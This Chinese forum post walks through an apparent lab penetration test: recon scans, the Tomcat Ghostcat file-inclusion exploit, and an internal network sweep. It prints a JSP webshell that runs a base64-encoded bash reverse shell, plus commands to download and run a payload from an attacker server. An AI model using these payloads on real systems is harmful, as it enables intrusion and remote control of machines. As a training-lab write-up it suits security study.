外网打点
信息搜集
直接用Fscan扫描下
![图片[1]-“突破内网渗透:云镜欺骗的探索”-山海云端论坛](https://www.shserve.cn/wp-content/uploads/2024/03/20240314155911826-image.png)
![图片[2]-“突破内网渗透:云镜欺骗的探索”-山海云端论坛](https://www.shserve.cn/wp-content/uploads/2024/03/20240314155923131-image.png)
点了点都是前端页面,没什么东西,使用dirsearch扫描后发现
虽然有漏洞点,可以进行文件执行和文件读取,但没有上传点,无法上传,接下来用dirsearch扫描一下
python3 dirsearch.py -u “http://39.99.243.184:8080/”
扫描结果
[07:40:20] Starting:
[07:40:22] 302 – 0B – /js -> /js/
[07:40:34] 200 – 114B – /404.html
[07:40:40] 400 – 795B – /\..\..\..\..\..\..\..\..\..\etc\passwd
[07:40:41] 400 – 795B – /a%5c.aspx
[07:41:14] 302 – 0B – /css -> /css/
[07:41:15] 302 – 0B – /data -> /data/
[07:41:17] 302 – 0B – /docs -> /docs/
[07:41:17] 200 – 17KB – /docs/
[07:41:17] 302 – 0B – /download -> /download/
[07:41:18] 200 – 132B – /download/
[07:41:20] 302 – 0B – /examples -> /examples/
[07:41:20] 200 – 6KB – /examples/servlets/index.html
[07:41:20] 200 – 1KB – /examples/
[07:41:20] 200 – 658B – /examples/servlets/servlet/CookieExample
[07:41:20] 200 – 947B – /examples/servlets/servlet/RequestHeaderExample
[07:41:20] 200 – 682B – /examples/jsp/snp/snoop.jsp
[07:41:26] 403 – 3KB – /host-manager/
[07:41:26] 403 – 3KB – /host-manager/html
[07:41:27] 302 – 0B – /images -> /images/
[07:41:29] 200 – 7KB – /index.html
[07:41:33] 302 – 0B – /lib -> /lib/
[07:41:37] 302 – 0B – /manager -> /manager/
[07:41:37] 403 – 3KB – /manager/admin.asp
[07:41:37] 403 – 3KB – /manager/
[07:41:37] 403 – 3KB – /manager/login
[07:41:37] 403 – 3KB – /manager/status/all
[07:41:37] 403 – 3KB – /manager/jmxproxy/?get=java.lang:type=Memory&att=HeapMemoryUsage
[07:41:37] 403 – 3KB – /manager/jmxproxy/?get=BEANNAME&att=MYATTRIBUTE&key=MYKEY
[07:41:37] 403 – 3KB – /manager/jmxproxy
[07:41:37] 403 – 3KB – /manager/jmxproxy/?qry=STUFF
[07:41:37] 403 – 3KB – /manager/jmxproxy/?get=java.lang:type=Memory&att=HeapMemoryUsage&key=used
[07:41:37] 403 – 3KB – /manager/html/
[07:41:37] 403 – 3KB – /manager/VERSION
[07:41:37] 403 – 3KB – /manager/jmxproxy/?set=BEANNAME&att=MYATTRIBUTE&val=NEWVALUE
[07:41:37] 403 – 3KB – /manager/html
[07:41:38] 403 – 3KB – /manager/login.asp
[07:41:38] 403 – 3KB – /manager/jmxproxy/?invoke=Catalina%3Atype%3DService&op=findConnectors&ps=
[07:41:38] 403 – 3KB – /manager/jmxproxy/?set=Catalina%3Atype%3DValve%2Cname%3DErrorReportValve%2Chost%3Dlocalhost&att=debug&val=cow
[07:41:38] 403 – 3KB – /manager/jmxproxy/?invoke=BEANNAME&op=METHODNAME&ps=COMMASEPARATEDPARAMETERS
[07:42:11] 403 – 0B – /upload/
[07:42:11] 403 – 0B – /upload
[07:42:12] 403 – 0B – /upload/b_user.csv
[07:42:12] 403 – 0B – /upload/loginIxje.php
[07:42:12] 403 – 0B – /upload/test.txt
[07:42:12] 403 – 0B – /upload/1.php
[07:42:12] 403 – 0B – /upload/test.php
[07:42:12] 403 – 0B – /upload/b_user.xls
[07:42:12] 403 – 0B – /upload/upload.php
[07:42:12] 403 – 0B – /upload/2.php
[07:42:12] 200 – 9KB – /user.html
访问/docs可以发现是Tomcat 9.0.30,直接搜所相关漏洞,可以发现CNVD-2020-10487漏洞,可以进行任意文件读取和文件包含
访问/docs可以发现是Tomcat 9.0.30,直接搜所相关漏洞,可以发现CNVD-2020-10487漏洞,可以进行任意文件读取和文件包含
![图片[3]-“突破内网渗透:云镜欺骗的探索”-山海云端论坛](https://www.shserve.cn/wp-content/uploads/2024/03/20240314160228686-image.png)
但是我们需要有恶意文件才能包含从而获取权限,因此我们需要找到一个上传接口,正好在web.xml中发现接口UploadTestServlet,访问发现是上传文件接口,上传反弹shell文件,内容如下
<% java.io.InputStream in = Runtime.getRuntime().exec(“bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xLjEuMS4xLzEyMzQgMD4mMQ==}|{base64,-d}|{bash,-i}”).getInputStream(); int a = -1; byte[] b = new byte[2048]; out.print(“<pre>”); while((a=in.read(b))!=-1){ out.println(new String(b)); out.print(“</pre>”); } %>
![图片[4]-“突破内网渗透:云镜欺骗的探索”-山海云端论坛](https://www.shserve.cn/wp-content/uploads/2024/03/20240314160308168-image.png)
![图片[5]-“突破内网渗透:云镜欺骗的探索”-山海云端论坛](https://www.shserve.cn/wp-content/uploads/2024/03/20240314160327687-image.png)
反弹shell
首先监听端口nc -lvnp 7777
接下来使用脚本进行文件包含
python3 tomcat.py http://39.99.243.184:8080/ 8009 xx.txt eval
内网横向
信息搜集
使用VIPER生成木马后上传至靶机攻击机:
python3 -m http.server
靶机
wget VPS:PORT/xxx.elf
./xxx.elf
上传后上传fscan和chisel,使用fscan进行C段探测meterpreter > shell -c ‘./fscan -h 172.22.11.76/24’
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| ‘__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.3
start infoscan
(icmp) Target 172.22.11.76 is alive
(icmp) Target 172.22.11.6 is alive
(icmp) Target 172.22.11.26 is alive
(icmp) Target 172.22.11.45 is alive
[*] Icmp alive hosts len is: 4
172.22.11.76:8080 open
172.22.11.76:22 open
172.22.11.26:445 open
172.22.11.45:445 open
172.22.11.6:445 open
172.22.11.45:139 open
172.22.11.26:139 open
172.22.11.6:139 open
172.22.11.26:135 open
172.22.11.45:135 open
172.22.11.6:135 open
172.22.11.76:8009 open
172.22.11.6:88 open
[*] alive ports len is: 13
start vulscan
[*] NetBios 172.22.11.6 [+] DC:XIAORANG\XIAORANG-DC
[*] NetBios 172.22.11.26 XIAORANG\XR-LCM3AE8B
[*] NetInfo
[*]172.22.11.6
[->]XIAORANG-DC
[->]172.22.11.6
[+] MS17-010 172.22.11.45(Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
[*] NetInfo
[*]172.22.11.26
[->]XR-LCM3AE8B
[->]172.22.11.26
[*] NetBios 172.22.11.45 XR-DESKTOP.xiaorang.lab Windows Server 2008 R2 Enterprise 7601 Service Pack 1
[*] WebTitle http://172.22.11.76:8080 code:200 len:7091 title:后台管理
已完成 13/13
[*] 扫描结束,耗时: 7.176621862s
![表情[qiudale]-山海云端论坛](https://www.shserve.cn/wp-content/themes/Shanhai/img/smilies/qiudale.gif)
我也是买了领不了、
暂无评论内容